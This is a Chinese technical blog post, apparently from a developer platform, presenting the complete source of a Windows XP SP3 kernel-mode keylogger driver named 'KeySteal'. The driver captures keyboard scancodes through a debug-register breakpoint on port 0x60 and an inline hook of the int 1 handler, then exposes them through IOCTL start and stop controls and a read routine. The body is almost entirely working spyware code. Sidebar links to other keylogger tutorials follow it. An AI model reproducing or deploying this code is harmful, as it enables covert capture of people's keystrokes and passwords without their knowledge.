利用debug功能的键盘记录器

最新推荐文章于 2021-11-26 11:46:20 发布
原创 最新推荐文章于 2021-11-26 11:46:20 发布 · 583 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#numbers #object #string #file #null #access

本文介绍了一个基于Windows内核的情景分析实现的键盘记录器。该记录器通过设置IO断点和使用内联钩子拦截int1中断来捕获键盘输入。文章提供了完整的源代码,并解释了如何启动和停止键盘记录器。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

为了巩固偶看内核情景第二章,第九章的知识,自己写了个键盘记录器。
原理很老套,无非是下io断点,inlinehook int 1 中断,详细的东东都可以在
windows内核情景分析第二章,软件调试第四章里找到,我就不搬教科书了00!也不是啥新东西。
#include
#include
#define IOCTL_START_KEYFIL CTL_CODE(FILE_DEVICE_UNKNOWN,0x810,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_STOP_KEYFIL CTL_CODE(FILE_DEVICE_UNKNOWN,0x811,METHOD_BUFFERED,FILE_ANY_ACCESS)
UCHAR Buffe_0_1_2[256];
ULONG Numbers,HookPointer, JmpOffset, HookOffset, HookCode,SaveOffset, KernelBase;
void SetBreakPoint()
{
  _asm {
    mov eax, 0x60
    mov dr3,eax
    _emit 0x0F
    _emit 0x20
    _emit 0xE0
    or eax, 0x8
    _emit 0x0F
    _emit 0x22
    _emit 0xE0
    mov eax, dr7
    or eax, 0x20000140
    mov dr7,eax
  }
}
void ClearBreakPoint()
{
  _asm {
      cli
      xor eax,eax
      mov dr3,eax
      _emit 0x0F
      _emit 0x20
      _emit 0xE0
      and eax, 0xfffffff7
      _emit 0x0F
      _emit 0x22
      _emit 0xE0
      mov eax, dr7
      and eax, 0xDffffebf
      mov dr7,eax
      sti
  }
}
void ClearHook ()
{
  _asm{
    cli
    mov  eax,cr0
    and  eax,not 10000h
    mov  cr0,eax
    mov ebx, HookPointer
    mov eax, SaveOffset
    xchg [ebx], eax
    mov  eax,cr0
    or   eax,10000h
    mov  cr0,eax
    sti
      }
}
void SetHook ()
{
  HookPointer = KernelBase + HookOffset;
  JmpOffset = HookCode - (HookPointer + 4);
  *(PUCHAR)(HookCode + 0x5d) = 0xe8;
  *(PULONG)(HookCode + 0x5e) =  (HookPointer + 4) + SaveOffset - (HookCode + 0x62);  
  _asm{
    cli
    mov  eax,cr0
    and  eax,not 10000h
    mov  cr0,eax
    mov ebx, HookPointer
    mov eax, JmpOffset
    xchg [ebx], eax
    mov SaveOffset, eax
    mov  eax,cr0
    or   eax,10000h
    mov  cr0,eax
    sti
      }
}
void  InlineHook()
{
  _asm {
    push eax
    push esi
    mov eax, dr7
    or eax, 0x20000140
    mov dr7,eax
    mov eax,dr6
    test eax, 8
    jz _pass
    mov esi, offset Buffe_0_1_2
    add esi, Numbers;
    mov eax, [ebp + 44h]
    mov byte ptr [esi], al
    inc Numbers
    cmp Numbers, 256
    jnz _jump
    xor eax,eax
    mov Numbers, eax
_jump:
    pop esi
    pop eax
    mov esp, ebp
    add esp, 30h
    pop gs
    pop es
    pop ds
    pop edx
    pop ecx
    pop eax
    add esp, 8
    pop fs
    pop edi
    pop esi
    pop ebx
    pop ebp
    add esp, 4
    iretd
_pass:
    pop esi
    pop eax
    nop
    nop
    nop
    nop
    nop
  }
}
NTSTATUS GetKernelBase ()
{
  NTSTATUS status;
  ULONG length;
  UNICODE_STRING Destination;
  PSYSMODULELIST sysinfo;
  RtlInitUnicodeString (&Destination, L"ZwQuerySystemInformation");
  ZwQuerySystemInformation = 
    (ZWQUERYSYSTEMINFORMATION)MmGetSystemRoutineAddress (&Destination);
  status = ZwQuerySystemInformation(SystemModuleInformation,NULL,0,&length);
  if (status == STATUS_INFO_LENGTH_MISMATCH)
  {
    sysinfo = ExAllocatePoolWithTag(NonPagedPool,length,0x123456);
    if (NULL == sysinfo)
    {
      return STATUS_INSUFFICIENT_RESOURCES;
    }
  }
  status = ZwQuerySystemInformation(SystemModuleInformation
    , sysinfo, length, &length);
  if(!NT_SUCCESS(status))
  {
    ExFreePoolWithTag (sysinfo, 0x123456);
    return STATUS_UNSUCCESSFUL;
  }
  KernelBase = sysinfo->smi[0].Base;
  ExFreePoolWithTag (sysinfo, 0x123456);
  return STATUS_SUCCESS;
}
NTSTATUS 
Unload (PDRIVER_OBJECT DriverObject)
{
  UNICODE_STRING SymbolLink;
  RtlInitUnicodeString (&SymbolLink, L"//??//KeySteal");
  ExFreePoolWithTag (HookCode, 0x123456);
  IoDeleteSymbolicLink (&SymbolLink);
  IoDeleteDevice (DriverObject->DeviceObject);
  return STATUS_SUCCESS;
}
NTSTATUS
ReadRoutine (
  PDEVICE_OBJECT DeviceObject,
  PIRP pIrp
  )
{
  NTSTATUS status = STATUS_SUCCESS;
  RtlCopyMemory (pIrp->AssociatedIrp.SystemBuffer, Buffe_0_1_2, 256);
  pIrp->IoStatus.Status = STATUS_SUCCESS;
  pIrp->IoStatus.Information = 256;
  IoCompleteRequest (pIrp, IO_NO_INCREMENT);
  return status;
}
NTSTATUS 
DeviceControlRoutine (
  PDEVICE_OBJECT DeviceObject,
  PIRP pIrp
  )
{
  ULONG code;
  PIO_STACK_LOCATION stack = NULL;
  stack = IoGetCurrentIrpStackLocation (pIrp);
  code = stack->Parameters.DeviceIoControl.IoControlCode;
  switch (code)
  {
  case IOCTL_START_KEYFIL:
    SetBreakPoint();
    SetHook();
    break;
  case IOCTL_STOP_KEYFIL:
    ClearBreakPoint();
    ClearHook();
    break;
  default:
    break;
  }
  pIrp->IoStatus.Status = STATUS_SUCCESS;
  pIrp->IoStatus.Information = 0;
  IoCompleteRequest (pIrp, IO_NO_INCREMENT);
  return STATUS_SUCCESS;
}
NTSTATUS
DispatchRoutine (
  PDEVICE_OBJECT DeviceObject, 
  PIRP pIrp)
{
  pIrp->IoStatus.Status = STATUS_SUCCESS;
  pIrp->IoStatus.Information = 0;
  IoCompleteRequest(pIrp, IO_NO_INCREMENT);
  return STATUS_SUCCESS;
}
NTSTATUS DriverEntry (PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegPath)
{
  int i;
  NTSTATUS status;
  PDEVICE_OBJECT DeviceObject;
  UNICODE_STRING DeviceName,SymbolLink;
  _asm int 3
  HookOffset = 0x67026; //just for winxp sp3
  RtlInitUnicodeString (&DeviceName, L"//Device//KeySteal");
  status = IoCreateDevice (
    DriverObject, 
    0, 
    &DeviceName, 
    FILE_DEVICE_UNKNOWN, 
    0, 
    FALSE, 
    &DeviceObject);
  if (!NT_SUCCESS(status))
  {
    return STATUS_UNSUCCESSFUL;
  }
  for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION+1; i++)
  {
    DriverObject->MajorFunction[i] = DispatchRoutine;
  }
  DeviceObject->Flags |= DO_BUFFERED_IO;  
  DriverObject->MajorFunction[IRP_MJ_READ] = ReadRoutine;
  DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DeviceControlRoutine;
  DriverObject->DriverUnload = Unload;
  //创建符号连接
  RtlInitUnicodeString (&SymbolLink, L"//??//KeySteal");
  status = IoCreateSymbolicLink (&SymbolLink, &DeviceName);
  if (!NT_SUCCESS (status))
  {
    if (NULL != DeviceObject)
    {
      IoDeleteDevice (DeviceObject);
    }
    return status;
  }
  RtlZeroMemory(Buffe_0_1_2, 0, 256);
  GetKernelBase();
  HookCode = ExAllocatePoolWithTag (NonPagedPool, 100, 0x123456);  
  RtlCopyMemory (HookCode, (ULONG)InlineHook + 8, 0x62);
  return STATUS_SUCCESS;
}

callesp
关注
C++程序调用SetWindowsHookEx全局拦截键盘按键消息和窗口消息的Hook实例分享
dvlinker的技术专栏
08-28 1万+
本文分享调用SetWindowsHookEx全局拦截键盘按键消息和窗口消息的两个Hook实例。
windows应用程序的开发一个键盘记录器
A1521315qwss的博客
08-16 494
一 .创建一个C工程,添加一个CPP文件 名字随便起 #include <Windows.h> extern "C" __declspec(dllimport) BOOL InstallHook(); extern "C" __declspec(dllimport) BOOL UninstallHook(); #pragma comment(lib, "kb.lib") LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM
eclipse上详细的debug过程和各按键的作用
zw904448290的博客
11-08 5517
http://blog.youkuaiyun.com/yjh_f/article/details/51718386
工具开发|键盘记录工具原理及代码实现
weixin_42282189的博客
11-26 1550
作者: Beard林 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 对于键盘记录简述 键盘记录一般用在后渗透中,以此方法寻求扩大战果。有些c2工具集成了这个功能,github上也有一些独立的工具,因为开发的语言不一样,大小也不一样,实用性也各不相同。 0x02 拆分键盘记录 键盘记录工具其实就是设置了一个钩子来获取按键的输入,流程如下: 1.工具创建进程 2.调用windows API 3.利用API钩子获取按键输入 4.将获取数据保存 用python实现以上要.
全局钩子详解
ccfxue的博客
05-03 6889
监控程序的实现       我们发现一些木马或其他病毒程序常常会将我们的键盘或鼠标的操作消息记录下来然后再将它发到他们指定的地方以实现监听.这种功能其他是利用了全局钩子将鼠标或键盘消息进行了截取,从而获得了操作的消息.要得到鼠标和键盘的控制权,我们要用SetWindowsHookEx这个函数:  HHOOK SetWindowsHookEx(     int idHook,        /
键盘记录器-------HOOK的应用举例
weixin_33919950的博客
04-16 197
KeyHookApp.cpp 1 //////////////////////////////////////////////// 2 // KeyHookApp.cpp文件 3 4 #include "resource.h" 5 #include "KeyHookApp.h" 6 #include "../09KeyHookLib/KeyHookLib.h" 7...
Windows Hook链机制详解
CodeBowl的博客
10-12 778
每一个Hook都有一个与之相关联的指针列表,称之为钩子链表,由系统来维护。 这个列表的指针指向指定的,应用程序定义的。
C++实现的Windows键盘记录器功能详解
资源摘要信息:"KeyLogger_Windows是一个使用C++编写的简单键盘记录器项目,该项目利用了Microsoft Windows平台的GetAsyncKeyState API函数来监控用户的击键。该项目的特征包括监控击键、隐身记录、获取活动窗口名称...
Android平台简易键盘记录器实现与分析
Android KeyLogger 是一个基于Android SDK中的SoftKeyboard示例修改而来的一款键盘记录器工具。该工具利用了Android系统的软键盘输入特性,并加入了记录按键的功能,当用户在设备上进行键盘输入时,每次按键都会被...
dos功能调用符和Debug程序调试
10-31
本文将详细介绍DOS的功能调用符以及如何利用Debug工具进行程序调试,这对于汇编语言初学者尤其有益。 #### DOS功能调用符概述 DOS功能调用符是指通过设置特定寄存器的值来调用DOS提供的系统服务的过程。这些服务...
利用vim-debugstring在Matlab中实现快速代码段删除与调试
- 熟悉Matlab代码与debugstring的交互方式,理解如何利用debugstring来插入和管理日志语句。 - 结合实际的开发和调试场景,实践使用debugstring工具来提升代码调试的效率。 以上知识点涵盖了debugstring工具的...
基于winhook的键盘记录器
05-11
用hook实现的键盘记录功能 在全局钩子中 可以拦截所有的消息 任意处理,大概这个是windows下的一大利器
基于内核的Linux键盘记录器
07-03
本文分成两个部分。第一部分给出了Linux键盘驱动的工作原理,而后给出了键盘记录器的工作细节及其源代码。
使用Windows全局钩子打造键盘记录器
雨者
02-18 2708
简介 键盘记录功能一直是木马等恶意软件窥探用户隐私的标配,那么这个功能是怎么实现的呢?在Ring3级下,微软就为我们内置了一个Hook窗口消息的API,也就是SetWindowsHookEx函数,这个函数能够实现优先拦截提交给特定窗口的信息,并进行拦截者需要的处理,然后再提交给窗口函数或是下一个钩子函数,函数第一个参数为idHook,需要设置钩子的类型,在以下代码样例中我们选择安装的钩子类型为W...
hook:实现简单的键盘记录器
CCCSSSDNNN的专栏
05-17 4449
说到hook技术,开始我真是一头雾水! 不久前看到一篇博客,实现 了一个简单的键盘记录器。我从中颇为受益!今天就来和大家分享一下我的一个小例子,并说说我的感悟! 首先就从main()函数开始吧,不过这个是带有窗口的程序,切记:WINAPI #define _WIN32_WINNT 0x0500 #include #include #include using namespa
安装钩子 SetWindowsHookE
10-04 453
SetWindowsHookEx 函数将应用程序定义的钩子安装到一个钩链。要将安装一个钩子来监测系统的某些类型的事件。这些事件是与特定的线程或所有线程中调用线程作为同一桌面相关联。 Syntax HHOOKSetWindowsHookEx(intidHook, HOOKPROClpfn, HINSTANCEhMod, DW...
C++ Hook 键盘记录器
LYSM
08-08 6571
之前写外挂做过指定进程的 Hook,但是没有尝试过全局 Hook,所以今天就来试试。全局 Hook 的用途我第一个就想到了键盘记录器(貌似我也就想到了这个 哈哈),那就写一个吧。 步伐逐渐鬼畜… 先上效果图(没图没真相,我看别人的博客都喜欢上来先看图,木哈哈 ~) U•ェ•*U 然后就是代码,我代码有点多,但是都有注释(注释就是艺术!) 其实也不多,就是 switch case 占了很大的比例...
SetWindowsHook详解及应用实例
热门推荐
tosim的博客
12-05 2万+
SetWindowsHook详解及应用实例
C++黑客编程:键盘记录器,HOOK技术实现
m0_47563648的博客
08-17 3931
有一种技术被称为HOOK,人们习惯上叫做钩子。钩子技术的应用范围比较广:输入监控,API拦截,消息捕获等等。 今天我们来做的是键盘记录器 编译工具:visual studio 2019 编程语言:自然是C++,Python做的我会写个标题“C++”吗? 编程技术:HOOK 另外我说一下: 中华人民共和国《网络安全法》规定了:任何窃取他人信息都是违法的!本文仅供技术参考,若有人使用本文技术非法窃取他人信息,作者不承担任何法律责任! HOOK技术分为好几种,我今天介绍一种:Windows钩子 Windo
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值